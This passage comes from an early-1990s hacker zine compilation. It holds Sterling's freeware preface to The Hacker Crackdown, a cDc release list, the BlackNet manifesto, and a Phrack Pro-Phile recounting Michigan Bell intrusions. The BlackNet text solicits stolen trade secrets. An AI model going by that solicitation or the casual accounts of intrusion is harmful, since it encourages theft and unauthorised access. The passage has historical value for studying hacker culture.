  5415. people anyway. Finally I would recommend this book to everyone who uses
  5416. UNIX a lot and likes to experiment and play with it (and has 60 bucks left).
  5417.  
  5418.  
  5419. Hacker Crackdown
  5420. ================
  5421.  
  5422. Now reading Bruce's book won't cost you 60 bucks. In fact, it will even
  5423. be totally FREE! I won't say too much about the book, because there have
  5424. already been great reviews in Phrack and 2600 in Spring/Summer 1993. It
  5425. is probably the most interesting and entertaining book about Hackers and
  5426. Fedz from 1993. But now Bruce decided to release the book as online
  5427. freeware - you may just grab the 270k file from a site, read it and give
  5428. it to anyone you want.
  5429.  
  5430. But let's listen to Bruce now and what he has to say...
  5431.  
  5432.  
  5433. January 1, 1994 -- Austin, Texas
  5434.  
  5435.      Hi, I'm Bruce Sterling, the author of this
  5436. electronic book.
  5437.  
  5438.      Out in the traditional world of print, *The
  5439. Hacker Crackdown* is ISBN 0-553-08058-X, and is
  5440. formally catalogued by the Library of Congress as "1.
  5441. Computer crimes -- United States.  2. Telephone --
  5442. United States -- Corrupt practices.  3.  Programming
  5443. (Electronic computers) -- United States -- Corrupt
  5444. practices."  'Corrupt practices,' I always get a kick out
  5445. of that description.  Librarians are very ingenious
  5446. people.
  5447.  
  5448.      The paperback is ISBN 0-553-56370-X.  If you go
  5449. and buy a print version of *The Hacker Crackdown,*
  5450. an action I encourage heartily, you may notice that
  5451. in the front of the book,  beneath the copyright
  5452. notice  -- "Copyright (C) 1992 by Bruce Sterling" -- it
  5453. has this little block of printed legal boilerplate from
  5454. the publisher.  It says, and I quote:
  5455.  
  5456.      "No part of this book may be reproduced or
  5457. transmitted in any form or by any means, electronic
  5458. or mechanical, including photocopying, recording,
  5459. or by any information storage and retrieval system,
  5460. without permission in writing from the publisher.
  5461. For information address:  Bantam Books."
  5462.  
  5463.      This is a pretty good disclaimer, as such
  5464. disclaimers go.  I collect intellectual-property
  5465. disclaimers, and I've seen dozens of them, and this
  5466. one is at least pretty straightforward.  In this narrow
  5467. and particular case, however, it isn't quite accurate.
  5468. Bantam Books puts that disclaimer on every book
  5469. they publish, but Bantam Books does not, in fact,
  5470. own the electronic rights to this book.  I do, because
  5471. of certain extensive contract maneuvering my
  5472. agent and I went through before this book was
  5473. written.  I want to give those electronic publishing
  5474. rights away through certain not-for-profit channels,
  5475. and I've convinced Bantam that this is a good idea.
  5476.  
  5477.      Since Bantam has seen fit to peaceably agree to
  5478. this scheme of mine, Bantam Books is not going to
  5479. fuss about this.  Provided you don't try to sell the
  5480. book, they are not going to bother you for what you
  5481. do with the electronic copy of this book. If you want
  5482. to check this out personally, you can ask them;
  5483. they're at 1540 Broadway NY NY 10036.  However, if
  5484. you were so foolish as to print this book and start
  5485. retailing it for money in violation of my copyright
  5486. and the commercial interests of Bantam Books,
  5487. then Bantam, a part of the gigantic Bertelsmann
  5488. multinational publishing combine, would roust
  5489. some of their heavy-duty attorneys out of
  5490. hibernation and crush you like a bug.  This is only to
  5491. be expected.  I didn't write this book so that you
  5492. could make money out of it.  If anybody is gonna
  5493. make money out of this book, it's gonna be me and
  5494. my publisher.
  5495.  
  5496.      My publisher deserves to make money out of
  5497. this book.  Not only did the folks at Bantam Books
  5498. commission me to write the book, and pay me a
  5499. hefty sum to do so, but they bravely printed, in text,
  5500. an electronic document the reproduction of which
  5501. was once alleged to be a federal felony.  Bantam
  5502. Books and their numerous attorneys were very
  5503. brave and forthright about this book.  Furthermore,
  5504. my former editor at Bantam Books, Betsy Mitchell,
  5505. genuinely cared about this project, and worked hard
  5506. on it, and had a lot of wise things to say about the
  5507. manuscript.  Betsy deserves genuine credit for this
  5508. book, credit that editors too rarely get.
  5509.  
  5510.      The critics were very kind to *The Hacker
  5511. Crackdown,* and commercially the book has done
  5512. well.  On the other hand, I didn't write this book in
  5513. order to squeeze every last nickel and dime out of
  5514. the mitts of impoverished sixteen-year-old
  5515. cyberpunk high-school-students.  Teenagers don't
  5516. have any money -- (no, not even enough for the  six-
  5517. dollar *Hacker Crackdown* paperback, with its
  5518. attractive bright-red cover and useful index).   That's
  5519. a major reason why teenagers sometimes succumb
  5520. to the temptation to do things they shouldn't, such
  5521. as swiping my books out of libraries.   Kids:  this one
  5522. is all yours, all right?  Go give the print version back.
  5523. *8-)
  5524.  
  5525.      Well-meaning, public-spirited civil libertarians
  5526. don't have much money, either.   And it seems
  5527. almost criminal to snatch cash out of the hands of
  5528. America's direly underpaid electronic law
  5529. enforcement community.
  5530.  
  5531.      If you're a computer cop, a hacker, or an
  5532. electronic civil liberties activist, you are the target
  5533. audience for this book.  I wrote this book because I
  5534. wanted to help you, and help other people
  5535. understand you and your unique, uhm, problems.  I
  5536. wrote this book to aid your activities, and to
  5537. contribute to the public discussion of important
  5538. political issues.  In giving the text away in this
  5539. fashion, I am directly contributing to the book's
  5540. ultimate aim:  to help civilize cyberspace.
  5541.  
  5542.      Information *wants* to be free.  And  the
  5543. information inside this book longs for freedom with
  5544. a peculiar intensity.  I genuinely believe that the
  5545. natural habitat of this book is inside an electronic
  5546. network.  That may not be the easiest direct method
  5547. to generate revenue for the book's author, but that
  5548. doesn't matter; this is where this book belongs by its
  5549. nature.  I've written other books -- plenty of other
  5550. books -- and I'll write more and I am writing more,
  5551. but this one is special.  I am making *The Hacker
  5552. Crackdown* available electronically as widely as I
  5553. can conveniently manage, and if you like the book,
  5554. and think it is useful, then I urge you to do the same
  5555. with it.
  5556.  
  5557.      You can copy this electronic book.   Copy the
  5558. heck out of it, be my guest, and give those copies to
  5559. anybody who wants them.  The nascent world of
  5560. cyberspace is full of sysadmins, teachers, trainers,
  5561. cybrarians, netgurus, and various species of
  5562. cybernetic activist.  If you're one of those people,  I
  5563. know about you, and I know the hassle you go
  5564. through to try to help people learn about the
  5565. electronic frontier.  I hope that possessing this book
  5566. in electronic form will lessen your troubles.  Granted,
  5567. this treatment of our electronic social spectrum is
  5568. not the ultimate in academic rigor.  And politically, it
  5569. has something to offend and trouble almost
  5570. everyone.   But hey, I'm told it's readable, and at
  5571. least the price is right.
  5572.  
  5573.      You can upload the book onto bulletin board
  5574. systems, or Internet nodes, or electronic discussion
  5575. groups.  Go right ahead and do that, I am giving you
  5576. express permission right now.  Enjoy yourself.
  5577.  
  5578.      You can put the book on disks and give the disks
  5579. away, as long as you don't take any money for it.
  5580.  
  5581.      But this book is not public domain.  You can't
  5582. copyright it in your own name.   I own the copyright.
  5583. Attempts to pirate this book and make money from
  5584. selling it may involve you in a serious litigative snarl.
  5585. Believe me, for the pittance you might wring out of
  5586. such an action, it's really not worth it.  This book
  5587. don't "belong" to you.  In an odd but very genuine
  5588. way, I feel it doesn't "belong" to me, either.  It's a
  5589. book about the people of cyberspace, and
  5590. distributing it in this way is the best way I know to
  5591. actually make this information available, freely and
  5592. easily, to all the people of cyberspace -- including
  5593. people far outside the borders of the United States,
  5594. who otherwise may never have a chance to see any
  5595. edition of the book, and who may perhaps learn
  5596. something useful from this strange story of distant,
  5597. obscure, but portentous events in so-called
  5598. "American cyberspace."
  5599.  
  5600.       This electronic book is now literary freeware.  It
  5601. now belongs to the emergent realm of alternative
  5602. information economics.  You have no right to make
  5603. this electronic book part of the conventional flow of
  5604. commerce.  Let it be part of the flow of knowledge:
  5605. there's a difference.   I've divided the book into four
  5606. sections, so that it is less ungainly for upload and
  5607. download; if there's a section of particular relevance
  5608. to you and your colleagues, feel free to reproduce
  5609. that one and skip the rest.
  5610.  
  5611.      Just make more when you need them, and give
  5612. them to whoever might want them.
  5613.  
  5614.      Now have fun.
  5615.  
  5616.      Bruce Sterling -- bruces@well.sf.ca.us
  5617.  
  5618. ------------------------------------------------------------------------------
  5619.   _   _
  5620.  ((___))
  5621.  [ x x ] cDc communications
  5622.   \   /  Global Domination Update #14
  5623.   (' ')  December 30th, 1993
  5624.    (U)
  5625. Est. 1986
  5626.  
  5627. New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for December, 1993:
  5628.  
  5629.  _________________________________/Text Files\_________________________________
  5630.  
  5631. 241: "Cell-Hell" by Video Vindicator.  In-depth article on modifying the
  5632. Mitsubishi 800 cellular phone by Mr. Fraud himself.  Rad.
  5633.  
  5634. 242: "The Darkroom" by Mark Vaxlov.  Very dark story about a high school rape
  5635. in the photography lab at school.  Disturbing.
  5636.  
  5637. 243: "Fortune Smiles" by Obscure Images.  Story set in the future with
  5638. organized crime and identity-swapping.
  5639.  
  5640. 244: "Radiocarbon Dating Service" by Markian Gooley.  Who would go out with
  5641. Gooley?  YOUR MOM!
  5642.  
  5643. 245: "The U.S. Mercenary Army" by Phil Agee.  Forwarded by The Deth Vegetable,
  5644. this file contains a speech by former CIA agent Agee on the Gulf War.
  5645. Interesting stuff.
  5646.  
  5647. 246: "The Monolith" by Daniel S. Reinker.  This is one of the most disgusting
  5648. files we've put out since the infamous "Bunny Lust."  I don't wanna describe
  5649. this, just read it.
  5650.  
  5651. 247: "Post-Election '92 Cult Coverage" by Omega.  Afterthoughts on Tequila
  5652. Willy's bid for the U.S. Presidency.
  5653.  
  5654. 248: "The Lunatic Crown" by Matthew Legare.  Wear the crown.  Buy a Slurpee.
  5655. Seek the adept.  Do not pass 'Go.'
  5656.  
  5657. 249: "Yet Another Suicide" by The Mad Hatter.  Guy gets depressed over a girl
  5658. and kills himself.
  5659.  
  5660. 250: "State of Seige" by Curtis Yarvin.  The soldiers hunt the dogs hunt the
  5661. soldiers.  Like, war, ya know.  Hell!
  5662.  
  5663.  __________________________________/cDc Gnuz\__________________________________
  5664.  
  5665.                            "cDc: We're Into Barbie!"
  5666.  
  5667. cDc mailing list: Get on the ever-dope and slamagnifiterrific cDc mailing list!
  5668. Send mail to cDc@cypher.com and include some wonderlessly elite message along
  5669. he lines of "ADD ME 2 DA MAILIN LIZT!!@&!"
  5670.  
  5671. NEW Official cDc Global Domination Factory Direct Outlets:
  5672. The Land of Rape and Honey     502/491-6562
  5673. Desperadoes                    +61-7-3683567
  5674. Underworld                     203/649-6103
  5675. Airstrip-One                   512/371-7971
  5676. Ministry of Death              516/878-1774
  5677. Future Shock                   +61-7-3660740
  5678. Murder, Inc                    404/416-6638
  5679. The Prodigal Sun               312/238-3585
  5680. Red Dawn-2 Enterprises         410/263-2258
  5681. Cyber Neurotic Reality Test    613/723-4743
  5682. Terminal Sabotage              314/878-7909
  5683. The Wall                       707/874-1316,2970
  5684.  
  5685. We're always taking t-file submissions, so if you've got a file and want to
  5686. really get it out there, there's no better way than with cDc.  Upload text to
  5687. The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post
  5688. office box in Lubbock, TX.
  5689.  
  5690. cDc has been named SASSY magazine's "Sassiest Underground Computer Group."
  5691. Hell yeah!
  5692.  
  5693. Thanks to Drunkfux for setting up another fun HoHoCon this year, in Austin.  It
  5694. was cool as usual to hang out with everyone who showed up.
  5695.  
  5696. Music credits for stuff listened to while editing this batch of files: Zapp,
  5697. Carpenters, Deicide, and Swingset Disaster.
  5698.  
  5699. Only text editor worth a damn: ProTERM, on the Apple II.
  5700.  
  5701. So here's the new cDc release.  It's been a while since the last one.  It's out
  5702. because I fucking felt like it, and have to prove to myself that I can do this
  5703. crap without losing my mind and having to go stand in a cotton field and look
  5704. at some dirt at 3 in the morning.  cDc=cDc+1, yeah yeah.  Do you know what this
  5705. is about?  Any idea?  This is SICK and shouldn't be harped on or celebrated.
  5706. This whole cyberdweeb/telecom/'puter underground scene makes me wanna puke,
  5707. it's all sick and dysfunctional.  Eat my shit, G33/<W0r|_<|.  Virus yourself to
  5708. death.  Go blind staring at the screen waiting for more wares/inph0 to come
  5709. trickling down the wire.  The more of that shit comes in, the more life goes
  5710. out.  Ooh, and you hate it so much, don't you.  You hate it.
  5711.  
  5712. Hacking's mostly a big waste of time.  Fuck you.
  5713. Stupid Telephone Tricks will never be on David Letterman.  Fuck you.
  5714. Cryptography?  Who'd wanna read YOUR boring email?  Fuck you.
  5715. Interactive television is a couch potato trap.  Fuck you.
  5716. "Surf the net," sucker.  "Ride the edge," you maladjusted sack of shit.
  5717.  
  5718. S. Ratte'
  5719. cDc/Editor and P|-|Ear13zz |_3@DeRrr
  5720. "We're into t-files for the groupies and money."
  5721. Fuck you, fuck you... and most of all, fuck YOU.
  5722.  
  5723. Write to: cDc communications, P.O. Box 53011, Lubbock, TX  79453.
  5724. Internet: sratte@phantom.com.
  5725.  _____________________________________________________________________________
  5726.  
  5727.   cDc Global Domination Update #14-by Swamp Ratte'-"Hyperbole is our business"
  5728.  
  5729.  
  5730. ALL NEW cDc RELEASES FTP'ABLE FROM FTP.EFF.ORG -pub/Publications/CuD/CDC
  5731.  
  5732. ------------------------------------------------------------------------------
  5733.  
  5734. Introduction to BlackNet
  5735.  
  5736.  
  5737. Your name has come to our attention. We have reason to believe you may
  5738. be interested in the products and services our new organization,
  5739. BlackNet, has to offer.
  5740.  
  5741. BlackNet is in the business of buying, selling, trading, and otherwise
  5742. dealing with *information* in all its many forms.
  5743.  
  5744. We buy and sell information using public key cryptosystems with
  5745. essentially perfect security for our customers. Unless you tell us who
  5746. you are (please don't!) or inadvertently reveal information which
  5747. provides clues, we have no way of identifying you, nor you us.
  5748.  
  5749. Our location in physical space is unimportant. Our location in
  5750. cyberspace is all that matters. Our primary address is the PGP key
  5751. location: "BlackNet<nowhere@cyberspace.nil>" and we can be contacted
  5752. (preferably through a chain of anonymous remailers) by encrypting a
  5753. message to our public key (contained below) and depositing this
  5754. message in one of the several locations in cyberspace we monitor.
  5755. Currently, we monitor the following locations: alt.extropians,
  5756. alt.fan.david-sternlight, and the "Cypherpunks" mailing list.
  5757.  
  5758. BlackNet is nominally nondideological, but considers nation-states,
  5759. export laws, patent laws, national security considerations and the
  5760. like to be relics of the pre-cyberspace era. Export and patent laws
  5761. are often used to explicity project national power and imperialist,
  5762. colonialist state fascism. BlackNet believes it is solely the
  5763. responsibility of a secret holder to keep that secret--not the
  5764. responsibility of the State, or of us, or of anyone else who may come
  5765. into possession of that secret. If a secret's worth having, it's worth
  5766. protecting.
  5767.  
  5768. BlackNet is currently building its information inventory. We are
  5769. interested in information in the following areas, though any other
  5770. juicy stuff is always welcome. "If you think it's valuable, offer it
  5771. to us first."
  5772.  
  5773. - - trade secrets, processes, production methods (esp. in
  5774. semiconductors) - nanotechnology and related techniques (esp. the
  5775. Merkle sleeve bearing) - chemical manufacturing and rational drug
  5776. design (esp. fullerines and protein folding) - new product plans, from
  5777. children's toys to cruise missiles (anything on "3DO"?)  - business
  5778. intelligence, mergers, buyouts, rumors
  5779.  
  5780. BlackNet can make anonymous deposits to the bank account of your
  5781. choice, where local banking laws permit, can mail cash directly (you
  5782. assume the risk of theft or seizure), or can credit you in
  5783. "CryptoCredits," the internal currency of BlackNet (which you then
  5784. might use to buy _other_ information and have it encrypted to your
  5785. special public key and posted in public place).
  5786.  
  5787. If you are interested, do NOT attempt to contact us directly (you'll
  5788. be wasting your time), and do NOT post anything that contains your
  5789. name, your e-mail address, etc. Rather, compose your message, encrypt
  5790. it with the public key of BlackNet (included below), and use an
  5791. anonymous remailer chain of one or more links to post this encrypted,
  5792. anonymized message in one of the locations listed (more will be added
  5793. later). Be sure to describe what you are selling, what value you think
  5794. it has, your payment terms, and, of course, a special public key (NOT
  5795. the one you use in your ordinary business, of course!) that we can use
  5796. to get back in touch with you. Then watch the same public spaces for a
  5797. reply.
  5798.  
  5799. (With these remailers, local PGP encryption within the remailers, the
  5800. use of special public keys, and the public postings of the encrypted
  5801. messages, a secure, two-way, untraceable, and fully anonymous channel
  5802. has been opened between the customer and BlackNet. This is the key to
  5803. BlackNet.)
  5804.  
  5805. A more complete tutorial on using BlackNet will soon appear, in
  5806. plaintext form, in certain locations in cyberspace.
  5807.  
  5808. Join us in this revolutionary--and profitable--venture.
  5809.  
  5810.  
  5811. BlackNet<nowhere@cyberspace.nil>
  5812.  
  5813. -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.3
  5814.  
  5815. mQCPAixusCEAAAEEAJ4/hpAPevOuFDXWJ0joh/y6zAwklEPige7N9WQMYSaWrmbi
  5816. XJ0/MQXCABNXOj9sR3GOlSF8JLOPInKWbo4iHunNnUczU7pQUKnmuVpkY014M5Cl
  5817. DPnzkKPk2mlSDOqRanJZCkyBe2jjHXQMhasUngReGxNDMjW1IBzuUFqioZRpABEB
  5818. AAG0IEJsYWNrTmV0PG5vd2hlcmVAY3liZXJzcGFjZS5uaWw+
  5819. =Vmmy
  5820. -----END PGP PUBLIC KEY BLOCK-----
  5821.                               ==Phrack Magazine==
  5822.  
  5823.                  Volume Five, Issue Forty-Five, File 7 of 28
  5824.  
  5825. ****************************************************************************
  5826.  
  5827.  
  5828.                             -:[ Phrack Pro-Phile ]:-
  5829.  
  5830. This issue our prophile introduces you to one of the all-around coolest
  5831. people ever to show up in the computer underground.  Someone I'm happy
  5832. to have had the good fortune to meet and force to ingest excessive quantities
  5833. of intoxicating liquids and other unmentionables.  Someone who very
  5834. recently showed up on tabloid television amazingly for something other than
  5835. computer hacking.  Someone we know as:
  5836.  
  5837.                                    Control C
  5838.                                    ~~~~~~~~~
  5839. _______________________________________________________________________________
  5840.  
  5841. Personal Info:
  5842.  
  5843.                 Handle  :  Control C
  5844.                 Call Me :  A Cab
  5845.                    DOB  :  1969
  5846.                    AGE  :  I Would Hope You Can Figure It Out..
  5847.                 Height  :  6'0"
  5848.                 Weight  :  160
  5849. Groups Affiliated With  :  Legion of Doom/Hackers!
  5850.     Other Past Handles  :  Phase Jitter, Master of Impact, Dual Capstan,
  5851.                            Richo Sloppy, Cosmos Dumpster Driver, Poster Boy,
  5852.                            Whacky Wally (Sysop Whacky Wally's Wonderful World
  5853.                            of Warez, as some of you may remember..  It Was a
  5854.                            Hack/Phreak Board)
  5855.  
  5856.  
  5857. Computers Owned:
  5858.  
  5859. 1st Computer-Texas Instruments T-1000
  5860. -------------------------------------
  5861. Once I expanded the memory (4K plug in Module, for a total of
  5862. 8k), I was unstoppable in BASIC.
  5863.  
  5864. Commodore Vic-20
  5865. ----------------
  5866. What can you say about a Vic-20?
  5867.  
  5868. Commodore 64
  5869. ------------
  5870. Now I was big time.  1541 Disk drive was an unbelievable upgrade
  5871. from my Vic-20 and T-1000 mass storage devices (Cassette
  5872. Recorder).
  5873.  
  5874. Apple //C
  5875. ---------
  5876. I was now a \/\/Arez d00d.  What else could you be if you had an
  5877. Apple?  Everyone was!
  5878.  
  5879. IBM XT
  5880. ------
  5881. This was a real step up from CP/M (hahaha).  I had incredible CGA
  5882. Graphics. Actually it was not a bad system.  My dad got a modem
  5883. with it.  Bad mistake eh?  I was flying at 300 baud.  This is the
  5884. system all my BBSes were run on.
  5885.  
  5886. AT&T 3B1
  5887. --------
  5888. Lame, Lame, Lame...  That about covers it.
  5889.  
  5890. Commodore AMIGA 500
  5891. --------------------
  5892. A real computer at last.  Real graphics.  Real Sound.  Real
  5893. Multi-Tasking. A Real Operating System.  And again...I was a
  5894. \/\/ArEz D00D.  But this time I was running 14.4K Baud. If you
  5895. want a real computer BUY AMIGA!!!
  5896.  
  5897.  
  5898. IBM 486DX2/66
  5899. -------------
  5900. Desk Top Video is really cool.  But when you put you computers in
  5901. the car people steal them and AAA Insurance gives you a hard
  5902. time.  Still fighting with them.
  5903.  
  5904. Commodore AMIGA 3000
  5905. --------------------
  5906. I'm a \/\/arez Dood.  And the KING of Desk Top Video.  BUT don't
  5907. put all your computers in the same car.  Oops...
  5908.  
  5909. Commodore AMIGA 500
  5910. -------------------
  5911. Now I'm back to a 500 Until I get my Insurance company to pay me.
  5912.  
  5913. ----------------------------------------------------------------------
  5914.  
  5915. General Questions:
  5916.  
  5917. Q: How did you get your Handle?
  5918.  
  5919. A: If you cant figure this out...you should not be reading this.
  5920.  
  5921. Q: How did you get started?
  5922.  
  5923. A: Dad bought me an IBM XT with a 300 Baud Modem.  I saw War
  5924.    Games...and off I went.
  5925.  
  5926. Q: What are some of your other interests?
  5927.  
  5928. A: Women... Women... Women... Everybody knows about my high
  5929.    level of hormonal activity.  Also, Cars.  If you don't have a
  5930.    Mitusubishi 3000GT:  U R Lame.  If you have a Stealth, I bet you
  5931.    wish you bought a 3000GT--after you have dealt with the FUCKING
  5932.    ASSHOLES at the Chrysler DealerShit.   Everybody says buy
  5933.    American.  Well, you buy a FUCKING brand new American car and it
  5934.    brakes down 32 times.  The Chrysler dealer treats you like shit.
  5935.    The manufacturer treats you like shit.  And your car runs like
  5936.    shit.  The problem is that the American auto workers have
  5937.    absolutely no pride in their workmanship; and the manufacturers
  5938.    and dealers don't give a shit about you or your car after they
  5939.    have made the sale.  Then they wonder why their sales are down
  5940.    and people are buying foreign cars.  Well, if I go into the
  5941.    Mitusubishi Dealership they treat me like a king and I bought the
  5942.    car 6 months ago.  If your gonna by a car, don't buy a Chrysler.
  5943.    They Suck!  I bought a brand new Jeep.  It broke down 32 Times.
  5944.    Chrysler treated me like shit.  Maybe you could tell.
  5945.  
  5946. Q: What were some of your most memorable experiences?
  5947.  
  5948. A: The First SummerCon.  Disk Jockey and LOKI came to my house
  5949.    the day before.  This is the first time we had met.  On the way
  5950.    to my house they got lost and came across a street called
  5951.    'Summerton.'  So at about 0200 in the morning we were on the corner
  5952.    of Summerton Street and all the sudden the Summerton sign fell of
  5953.    the post and landed in the car owned by Disk Jockey.  Well we
  5954.    changed the T to a C and all the suddenly we had a SummerCon
  5955.    street sign.
  5956.  
  5957.    The trip down was a story in it self,  as many of you have
  5958.    heard. It was really neat to meet all the people from the
  5959.    boards.  I met Bill From RNOC who was my mentor and idol, but doesn't
  5960.    call me anymore.. (Thanks Bill).  Lex Luthor who is one of the
  5961.    funniest guys, we will get into this later.  Taran King, Knight
  5962.    Lightning (Scoop!), Lucifer 666...it was ELITE!
  5963.  
  5964.    SummerCon 87' -  This is when I got it LOD/H.  I remember sitting
  5965.    at the pool with Mentor being really drunk and both of us going
  5966.    "WOW!!! We're in LOD!"
  5967.  
  5968.    My Bust -  In 1987 I was going to school in Chicago.  I was on an
  5969.    Michigan Bell UNIX sharpening up my C programming skills, which,
  5970.    buy the way still need sharpening.  I was on the system for 4+
  5971.    hours.  Well the system administrator had noticed me and called
  5972.    MBT security.  They traced the call back to Chicago.  The strange
  5973.    part of this was that the next morning I was quitting school and
  5974.    moving back to Detroit.  When I got home to Detroit their was a
  5975.    message from MBT Security to call them or they would "Call On
  5976.    Me!".  Well I thought it would be in my best interest to give
  5977.    them a ring.   We met for lunch.
  5978.  
  5979.    At lunch they told me since I had been in their systems for years
  5980.    and not destroyed or changed anything...in fact they had never
  5981.    noticed me there...They  would not press charges if I helped them
  5982.    secure there systems.  I said "Ok!".
  5983.  
  5984.    The next thing I know I have an office.  k-Rad elite computer.
  5985.    Craft Access terminals.  Manuals for every phone company computer
  5986.    on the planet and they are paying me $30,000 a year to do what I
  5987.    love.  I was a professional Computer Hacker.  I broke into
  5988.    Michigan Bell computers, networks, switches, went trashing
  5989.    etc...while being paid.  It was great.  I would see what I could
  5990.    do once I was into their systems, then write a report on what
  5991.    needed to be changed or fixed.  I was great for them, and me.
  5992.  
  5993.    Then I get fired - my boss at Michigan Bell loves me!  Her boss
  5994.    loves me!  The Vice President of Michigan Bell loves me!  Then
  5995.    Michigan Bell has a retirement incentive. The Vice President and
  5996.    my bosses boss retire.  The New manager of computer security is
  5997.    closed-minded, and fires me because I am "A criminal".
  5998.  
  5999.    Well, those guys at corporate security at Michigan Bell are
  6000.    totally out of touch. Their knowledge of computer security
  6001.    is...how shall I say it..."lacking," I think, covers it.  In
  6002.    fact, the code for the front door at the Michigan Bell Corporate
  6003.    Security Building is the equivalent to leaving the code on your
  6004.    luggage 000 and wondering how the airport baggage guy figure out
  6005.    your code and stole all your stuff.   They should have kept
  6006.    me on like the old guys wanted to do.
  6007.  
  6008.    It is my understanding,  and I don't know because I don't do
  6009.    ANYTHING ILLEGAL (like the disclaimer?), but I hear that a lot of
  6010.    hackers are in Michigan Bell Systems.  Michigan Bell Security is
  6011.    probably convinced that their systems are airtight.  If you guys
  6012.    at Michigan Bell are reading this,  You need help..  Look through
  6013.    some of my old reports and implement some of that stuff.
  6014.  
  6015. ----------------------------------------------------------------------
  6016.  
  6017. Some BBS's To Mention:
  6018.  
  6019. Planet 10/Librarians of Doom - (810)683-9722.  I'm Co-Sysop.  It
  6020. is the only BBS I call. All the Old LOD Guys are on it.  It's
  6021. pretty 3l33t.  If you can't hack the  New User Password--U R
  6022. really lame!  We got 0 day AMIGA Warez.  Running on a USR HST.
  6023. Leave a good New User Feedback message because the users on the
  6024. system read the New User Feedback and vote whether or not you
  6025. will be allowed access to the system based on that message.
  6026.  
  6027. ShadowSpawn BBS - Well, this was before I was in LOD.  Our claim
  6028. to fame was that we wouldn't let anyone on the BBS unless they
  6029. gave us a valid phone number.  We voice verified EVERYONE.  And
  6030. talked to them before we gave them an account.  Most of the
  6031. people from LOD were not on because they would not give a valid
  6032. phone number.  It was not my idea it was Psychic Warlord's idea.
  6033. I could not believe we turned Lex Luthor down--we got in quite a
  6034. fight about that.
  6035.  
  6036. Phantasy Realm - My first BBS.  I always thought It was LAME,
  6037. but people always tell me how cool it was.  I guess when you
  6038. login 15 times a day, it seems like the posting is slow.
  6039.  
  6040. The Coalition - I was co-sysop on this board as well.  Run by Bad
  6041. Subscript, one of my best friends.  Another board I never thought
  6042. was cool but everyone says it was great.  Guess maybe I called it
  6043. too much as well.
  6044.  
  6045. Metal Shop Private - I thought I was the Elite of the Elite when
  6046. I got on there.  There were guys from LOD posting and everything.
  6047. I really was a cool system.
  6048.  
  6049. Catch 22 - Well I think I was the last user before the system
  6050. went down.  I think I was on for about 3 days before it went off
  6051. line.  I think it was good.  As least I used it for a reference
  6052. on other BBS (That was when I was just becoming well known.)
  6053.  
  6054. Whacky Wally's Wonderful World Of Warez - Some of you may
  6055. remember it.  It was an H/P board that I ran for a while before
  6056. Phantasy Realm.  It was mostly done for a joke, but it ended up
  6057. being pretty cool.
  6058.  
  6059. ----------------------------------------------------------------------
  6060.  
  6061. People to mention:
  6062.  
  6063. Erreth Akbe -  One of my best friends.  Helped me write this
  6064. profile.  Sysop of Planet 10/Librarians of Doom. The MASTER
  6065. NOVELL guy.  If you want to  know anything about NOVELL...Talk to
  6066. him.  (He's a CNE!!)  Without him you would have all sorts of
  6067. spelling errors and this profile would really look like shit.
  6068. Plus, the BBS would have crashed long ago.  He's my official
  6069. editor.
  6070.  
  6071. Carol - Erreth Akbe's Wife.  Love ya babe!  Got me a great deal
  6072. on my 3000GT.  I still owe you dinner!
  6073.  
  6074. Bad Subscript - My best friend.  What a great guy.  We hit
  6075. Industry (the coolest nightclub in Pontiac) every Tuesday night.
  6076. He's the biggest LEEEECH in the world, though.  At this point he
  6077. has 192 Downloads @ 94 Megs and 9 Uploads @ 2 Megs.  Great ratio, eh?
  6078.  
  6079. Lucifer 666 - What a great guy.  Still talk to him daily after
  6080. all these years.  Comes to Detroit a lot and I go to Illinois to
  6081. see him a lot. I have a great story about L666.  His family owns a
  6082. real estate company in Illinois where he lives.   Well, they sold
  6083. a house to Virgil Ramsey, a Vietnam Vet.  Well, Mr. Ramsey's new
  6084. house has termite damage.  L666 went to the house and verified
  6085. the damage.  He told Mr. Ramsey that he would call an
  6086. exterminator the next day.  Well I guess Mr. Ramsey didn't like
  6087. the exterminator idea, because the next day he went to L666's
  6088. office with a bolt-action rifle.  Took L666 outside into the
  6089. street, with the gun to his head, and told him he was going to
  6090. kill him.  L666 swung around and hit the gun barrel upwards just
  6091. as Ramsey pulled the trigger.  They fought over the gun and L666
  6092. tossed the gun into the street.  Ramsey went after the gun and
  6093. L666 ran into the real estate building and locked the back door.
  6094. Ramsey ran in the front door with gun in hand.  L666 went into
  6095. his office and locked the door.  Ramsey kicked in his office
  6096. door.  L666 was under his desk.  Ramsey said "Stand Up (L666's
  6097. First Name) and take it like a Man!" L666 jumped up and they
  6098. fought over the gun again.  (I was at his office and saw the
  6099. footprints on his door).  The bolt action opened and the bullet
  6100. in the chamber fell to the ground.  Ramsey put the gun to L666's
  6101. head and pulled the trigger, but the action was open.  The cops
  6102. finally came in and arrested Ramsey.  They say it is some type of
  6103. stress related to Vietnam.
  6104.  
  6105. Laurie (L666's Girlfriend) - She's Cool.  Hi Hoochie!  Well I
  6106. have a good story about her.  BTW If you talk to L666 ask him why
  6107. I call his girlfriend "Baldie".  Anyway.  L666 and Laurie came to
  6108. Detroit in October.  The first night we went to this bar that I
  6109. always go to, called Industry.  Well Laurie was worried about the
  6110. crime in Detroit.  I had just got done telling her that nothing
  6111. ever happens Besides, we were in Pontiac!  L666, Bad Subscript,
  6112. Erreth Akbe DarkStar, Laurie and I were all in the car.  We
  6113. pulled into the Industry parking lot.  Some guy was laying on the
  6114. ground and 3 guys were kicking him.  Then they picked him up.
  6115. Through him into the back of a panel van and drove off. L666,
  6116. DarkStar and Laurie had been in Detroit for all of an hour and
  6117. this is the first thing we see when we go to the bar.  Needless
  6118. to say, she was freaking out.  The rest of the weekend went
  6119. smoothly, though--except for DarkStar and L666 flashing deuce
  6120. gang signs at Club X in Detroit.  Not a smart move.
  6121.  
  6122. DarkStar - Hay bud.  He's really fun.  We party together a lot
  6123. in Detroit and Illinois, but I wouldn't take him to Las Vegas
  6124. with me.  He did really shitty on the river boat we gambled on in
  6125. the Mississippi river last November.
  6126.  
  6127. Prime Suspect - Fellow LOD member.  One of the smartest hackers I
  6128. have ever met.  In fact PR1ME Computers call him to help program
  6129. there kernels when they can't figure it out.  No lie!  He also is
  6130. Mr. Packet Radio.  I really had fun with the cellular phone
  6131. interception.  I talk to him 3-4 times a week. He and Bad
  6132. Subscript talk more, though.  Finally after 6 or 7 years he came
  6133. to Detroit to see us last November.  We had a great time.  I'm
  6134. sure he'll be back.
  6135.  
